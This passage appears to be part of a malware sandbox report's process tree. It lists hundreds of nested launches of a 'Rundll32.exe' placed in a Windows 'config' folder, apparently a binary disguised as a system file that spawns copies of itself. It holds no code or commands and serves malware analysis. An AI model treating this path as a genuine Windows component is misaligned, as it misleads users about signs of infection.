        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        234⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        235⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        236⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        237⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        238⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        239⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        240⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        241⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        242⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        243⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        244⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        245⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        246⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        247⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        248⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        249⤵
        
        PID:3904
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        250⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        251⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        252⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        253⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        254⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        255⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        256⤵
        
        PID:848
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        257⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        258⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        259⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        260⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        261⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        262⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        263⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        264⤵
        
        PID:1348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        265⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        266⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        267⤵
        
        PID:4732
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        268⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        269⤵
        
        PID:5732
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        270⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        271⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        272⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        273⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        274⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        275⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        276⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        277⤵
        
        PID:592
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        278⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        279⤵
        
        PID:1472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        280⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        281⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        282⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        283⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        284⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        285⤵
        
        PID:348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        286⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        287⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        288⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        289⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        290⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        291⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        292⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        293⤵
        
        PID:848
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        294⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        295⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        296⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        297⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        298⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        299⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        300⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        301⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        302⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        303⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        304⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        305⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        306⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        307⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        308⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        309⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        310⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        311⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        312⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        313⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        314⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        315⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        316⤵
        
        PID:5156
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        317⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        318⤵
        
        PID:1332
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        319⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        320⤵
        
        PID:944
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        321⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        322⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        323⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        324⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        325⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        326⤵
        
        PID:128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        327⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        328⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        329⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        330⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        331⤵
        
        PID:2052
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        332⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        333⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        334⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        335⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        336⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        337⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        338⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        339⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        340⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        341⤵
        
        PID:1888
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        342⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        343⤵
        
        PID:3516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        344⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        345⤵
        
        PID:3104
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        346⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        347⤵
        
        PID:788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        348⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        349⤵
        
        PID:1472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        350⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        351⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        352⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        353⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        354⤵
        
        PID:1296
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        355⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        356⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        357⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        358⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        359⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        360⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        361⤵
        
        PID:5332
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        362⤵
        
        PID:572
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        363⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        364⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        365⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        366⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        367⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        368⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        369⤵
        
        PID:1036
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        370⤵
        
        PID:728
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        371⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        372⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        373⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        374⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        375⤵
        
        PID:5316
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        376⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        377⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        378⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        379⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        380⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        381⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        382⤵
        
        PID:776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        383⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        384⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        385⤵
        
        PID:1332
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        386⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        387⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        388⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        389⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        390⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        391⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        392⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        393⤵
        
        PID:3244
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        394⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        395⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        396⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        397⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        398⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        399⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        400⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        401⤵
        
        PID:3896
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        402⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        403⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        404⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        405⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        406⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        407⤵
        
        PID:1888
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        408⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        409⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        410⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        411⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        412⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        413⤵
        
        PID:1988
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        414⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        415⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        416⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        417⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        418⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        419⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        420⤵
        
        PID:1520
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        421⤵
        
        PID:3528
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        422⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        423⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        424⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        425⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        426⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        427⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        428⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        429⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        430⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        431⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        432⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        433⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        434⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        435⤵
        
        PID:404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        436⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        437⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        438⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        439⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        440⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        441⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        442⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        443⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        444⤵
        
        PID:3520
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        445⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        446⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        447⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        448⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        449⤵
        
        PID:788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        450⤵
        
        PID:872
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
